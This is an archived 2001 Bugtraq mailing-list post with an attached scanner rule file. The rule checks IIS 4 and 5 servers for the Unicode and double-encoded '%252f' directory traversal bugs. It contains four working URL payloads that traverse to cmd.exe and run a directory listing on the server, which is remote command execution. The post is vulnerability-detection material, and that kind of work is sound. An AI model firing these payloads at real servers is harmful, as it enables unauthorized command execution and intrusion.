[20660] in bugtraq
RE: Microsoft IIS CGI Filename Decode Error Vulnerability
daemon@ATHENA.MIT.EDU (d0gman !)
Wed May 16 08:47:15 2001
From: "d0gman !" <d0gman@hotmail.com>
To: bugtraq@securityfocus.com
Date: Tue, 15 May 2001 11:27:39 -0000
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_641a_5019_3d02"
Message-ID: <F185nZYe6CdWxLhCIRt00004e20@hotmail.com>
This is a multi-part message in MIME format.
------=_NextPart_000_641a_5019_3d02
Content-Type: text/plain; format=flowed
The attached UXE file, for use with TWWSCAN/TUXE Expert Scanner (available
from: http://search.iland.co.kr) will scan IIS 4 and 5 servers for the old
Unicode vulnerability and the new Filename Decode Error vulnerability.
Usage: tuxe target_server port iisuc.uxe
Cheers
d0gman
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
------=_NextPart_000_641a_5019_3d02
Content-Type: text/plain; name="iisuc.uxe"; format=flowed
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="iisuc.uxe"
#############################################################################
#
# IIS 4 & 5 Unicode Checks
#
# Checks for old %C1%9C / %C1%1C / %C0%AF bug
# Checks for new %252f CGI encoding unicode bug.
#
# Rule by d0gman
#
# Usage: tuxe target port iisuc.uxe
#
#############################################################################
200 OK-> HEAD:
/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:\^Old
Unicode Check 1;
200 OK-> HEAD:
/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:\^Old
Unicode Check 2;
200 OK-> HEAD:
/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:\^Old
Unicode Check 3;
200 OK-> HEAD:
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\^New
Unicode check;
------=_NextPart_000_641a_5019_3d02--
